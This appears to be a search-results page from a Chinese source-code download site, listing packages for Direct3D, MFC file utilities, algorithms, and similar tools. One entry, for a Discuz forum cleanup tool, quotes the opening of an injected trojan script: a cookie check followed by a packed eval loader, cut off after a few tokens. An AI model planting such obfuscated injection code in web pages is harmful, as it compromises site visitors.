搜索资源列表
1584659874
- 在微软Direct3D中, 是用物体对光的反射属性来表达一个物体的材质的,很显然,金属的物体和塑料的物体对光的反射会有不同的反射效果。这样做虽然有时会产生失真,但对于屏幕渲染来说也是足够了。 在D3D中,用下列属性来表示一个物体的材质:-Microsoft Direct3D, the light is the reflection object attributes to an expression of the material objects, Clearly, metal obje
S4-000549R_PSS_GD_010_clean
- Streaming refers to the ability of an application to play synchronised media streams like audio and video streams in a continuous way while those streams are being transmitted to the client over a data network.-Streaming refers to the ability of an a
AMODIFIEDRAO-BLACKWELLISEDPARTICLEFILTER
- Rao-Blackwellised Particle Filters (RBPFs) are a class of Particle Filters (PFs) that exploit conditional dependencies between parts of the state to estimate. By doing so, RBPFs can improve the estimation quality while also reducing the overall
VCtxt
- VC读写文本文件, CString strLine while(file.ReadString(strLine)){str = strLine + \"P-Tree\" a<<str<<end
c-star
- .h 头文件:常量声明,结构体,函数的声明 .c/.cpp 变量、函数的实现 流程: 1。读文件,方法可用读 section或者txt(检查到头[descr iption],开始读) 2。while/for 开始解析数据(定义一个结构体,把每一行的每个数据分别存入结构体内。最好考虑下文件的占用问题,可以读1000个关文件,读后一1000个再打开文件) 注意:处理Item:判断lenth是否合法,char*是否为NULL 要写个HandleE
Data_Structures_and_Algorithms
- Data_Structures_and_Algorithms - These notes accompany Data Structures and Algorithms II. The course, to a large extent, follows on from Data Structures and Algorithms I. However, while DS&A I focused on fundamental datastructures, DS&A II will f
RANDOMIZ
- 一个可以产生均匀随机序列和高斯序列的程序,结果输出至文件,同时高斯序列输出概率分布统计文件,最方便的出图方法是用EXCEL-Can generate a uniform random sequences and sequences of Gaussian process, the resulting output to a file, while the output Gaussian probability distribution sequence statistics file, the
123
- 利用MFC计算一个公式数据,利用文本框显示出来,并将数据写入到EXCEL文件中,同时附带修改操作-Using MFC to calculate a formula data, use the text box is displayed, and write the data to EXCEL file, while incidental to modify the operating
findfiles
- 程序为MFC编写,实现VC下的单线程文件搜索,同时有进度控制功能,实现继续扫描功能,配合事件对象的使用-Procedures for the preparation of MFC to achieve VC file search under the single-threaded, while the progress of control functions, to achieve continued scanning feature, coupled with the use of eve
codecounter
- VC++版的源代码统计工具,可以按文件夹自动搜索源代码文件,并统计出每一个文件的代码行数、注释行数,可以自由添加文件类型、设定统计方法、还可以保存文件。虽然现在不怎么用这种工具,但可以学习一下算法和文件操作方面的知识。-VC++ version of the source code of statistical tools, can automatically search folder source code files, and statistics for each document th
simpleAlgorithm
- The file contains algorithm like flowyd warshall ,Job Sequencing with Deadlines while Maximizing Profits, reading text file , merge sort and Binary searcg tree. The files are freely available on net.-The file contains algorithm like flowyd warshall
DorpOpen
- 实现应用程序没有打开的情况下,拖放至图标上打开并显示文件内容,同时在打开的情况下也可以接受文件并显示。-To achieve the application does not open the case, drag and drop to the icon to open and display the content of the document, while open cases, can accept the file and displayed.
Multithread_Search_File
- 采用多线程搜索指定磁盘的文件,同时可以模糊匹配,和具体匹配等-Multi-threaded search the specified disk file, while blurring the match, and the specific matching
DiffLines
- Visual fast comparison of two huge (up to 4Gbytes) text files. Comparison is done in background thread, while viewing results.
2003dzclear
- 清除discuz论坛挂马的cookie代码(if(document.cookie.indexOf( helio )==-1){var expires=new Date() expires.setTime(expires.getTime()+24*60*60*1000) document.cookie= helio=Yes path=/ expires= +expires.toGMTString() eval(function(p,a,c,k,e,d){e=function(c){return
VCPrjToHtml
- 大部分VC编程的朋友都遇到过这种情况:写过的一大堆工程代码在硬盘里放着,有时候想找某个工程的源代码查看都找不到,同时一些不舍得删又没多大用的工程放在哪儿也占地方,像我就下载了很多教程的配套源代码,大小差不多有两三个多G,放在那儿实在是占地方。而且查看时得一个文件夹一个文件夹的找,太麻烦。所以没事就借用了Mike Benzinger写的的CppToHTML转换代码,写了一个将VC工程目录下的.cpp、.c、.h文件转换成html网页文件,同时将工程所需的所有项目文件、源文件、资源文件打包成rar的
Lib
- AV core...These file are needed while developing AV antivirus
NewCopyPdfFile
- 名字可能有点怪,只要是当时出于某咱考虑取了这个名,可不用太理会。 采用VC API实现枚举目录下所有文件,并可以递归子目录,同时实现两个功能:1,将所有搜索到的文件添加.bak后缀,并且存储到指定目录;2,又可以将所有带.bak后缀的文件完全改回原来的文件名。 功能不难,但功能都是在工作中经常使用到的。-Achieved using VC API enumeration directory of all files and subdirectories recursively, w
helptip
- VC++实现像Office助手一样的帮助精灵,也就是会在屏幕上出现一个小人,问询你要怎么操作,用户能选择是否显示或隐藏它,设置它的活动范围,同时它还支持网上读娶保存并显示文件的功能。 -VC++ to achieve the same as the Office Assistant help of the wizard, that is, there will be a villain on screen, you have to inquire how to operate, the us
Access-WordaExcel
- 用C++builder编写的小应用程序,可以导入任意Word、Excel文件,并带有编辑保存功能,即实现与Word、Excel的连接和通讯,方便了数据库处理时的操作流程,同时也提高了数据处理的安全性。-Written with C++ builder of small applications that can import any Word, Excel documents and edit the save function with that achieved with Word, Exc
